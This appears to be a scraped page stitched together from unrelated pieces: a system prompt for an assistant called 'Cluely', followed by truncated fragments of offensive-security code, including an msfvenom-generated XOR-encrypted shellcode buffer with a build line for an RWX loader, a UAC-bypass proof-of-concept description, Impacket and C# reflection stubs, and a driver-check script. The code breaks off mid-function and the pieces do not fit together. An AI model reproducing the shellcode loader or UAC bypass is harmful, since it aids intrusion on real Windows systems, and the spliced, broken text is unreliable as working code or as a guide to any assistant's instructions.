0乂ᐯ爪 0xvm

<core_identity> You are an assistant called Cluely, developed and created by Cluely, whose sole purpose is to analyze and solve problems asked by the user or shown on the screen. Your responses must be specific, accurate, and actionable. </core_identity>

<general_guidelines>

NEVER use meta-phrases (e.g., "let me help you", "I can see that").
NEVER summarize unless explicitly requested.
NEVER provide unsolicited advice.
NEVER refer to "screenshot" or "image" - refer to it as "the screen" if needed.
ALWAYS be specific, detailed, and accurate.

	#!/usr/bin/env python
	# Impacket - Collection of Python classes for working with network protocols.
	#
	# Copyright Fortra, LLC and its affiliated companies
	#
	# All rights reserved.
	#
	# This software is provided under a slightly modified version
	# of the Apache Software License. See the accompanying LICENSE file
	# for more information.

	# -- coding: utf-8 --
	import hashlib
	import base64
	import requests, string, struct, uuid, random, re
	import sys
	from collections import OrderedDict
	from sys import version
	from urllib3.exceptions import InsecureRequestWarning
	requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
	# too lazy to deal with string <-> bytes confusion in python3 so forget it ¯\_(ツ)_/¯

	unsigned long hash_string(void* buffer, unsigned long size, char* extension){
	unsigned char current = 0;
	unsigned long hash = 0;
	unsigned char* currentChar = NULL;
	hash = 1337;
	currentChar = (void*)buffer;
	hash++;

	while(1){
	current = *currentChar;

	#include <cstdint>

	// x86_64-w64-mingw32-g++ -lstdc++ -static -O3 -s -DPAYLOAD_SIZE=276 ./byorwx.cpp ./section.S -o ./byorwx.exe

	// msfvenom -p windows/x64/exec -f c CMD=calc.exe --encrypt xor --encrypt-key abcdef
	unsigned char buf[] =
	"\x9d\x2a\xe0\x80\x95\x8e\xa1\x62\x63\x64\x24\x37\x20\x32"
	"\x31\x35\x33\x2e\x50\xb0\x06\x2c\xee\x34\x01\x2a\xe8\x36"
	"\x7d\x2e\xea\x30\x43\x2c\xee\x14\x31\x2a\x6c\xd3\x2f\x2c"
	"\x2c\x53\xaa\x2c\x54\xa6\xcd\x5e\x02\x18\x67\x4a\x41\x23"

	/*
	TaskManagerSecret

	Author: @splinter_code

	This is a very ugly POC for a very unreliable UAC bypass through some UI hacks.
	The core of this hack is stealing and using a token containing the UIAccess flag set.
	A trick described by James Forshaw, so all credits to him --> https://www.tiraniddo.dev/2019/02/accessing-access-tokens-for-uiaccess.html
	From there it uses a task manager "feature" to run a new High IL cmd.exe.
	This has been developed only for fun and shouldn't be used due to its high unreliability.

	# Simple script to check drivers in C:\windows\system32\drivers against the loldrivers list
	# Author: Oddvar Moe - @oddvar.moe

	$drivers = get-childitem -Path c:\windows\system32\drivers
	$web_client = new-object system.net.webclient
	$jsonString = $web_client.DownloadString("https://www.loldrivers.io/api/drivers.json")
	$jsonString = $jsonString -replace '"INIT"','"init"'
	$loldrivers = $jsonString \| ConvertFrom-Json

	Write-output("Checking {0} drivers in C:\windows\system32\drivers against loldrivers.io json file" -f $drivers.Count)

	#!/usr/bin/python3
	from __future__ import division
	from __future__ import print_function
	import re
	import codecs
	import logging
	import time
	import argparse
	import sys
	from impacket import version

	using System;
	using System.Runtime.CompilerServices;
	using System.Reflection;
	using System.Reflection.Emit;
	namespace FunkyJit
	{
	class Program
	{
	public static void Nothing() { Console.WriteLine(); }
	static void Main(string[] args)

	using System;
	using System.Collections.Generic;
	using System.Linq;
	using System.Runtime.CompilerServices;
	using System.Net;
	using System.Reflection;
	using System.Runtime.InteropServices;
	namespace Test
	{
	// CCOB IS THE GOAT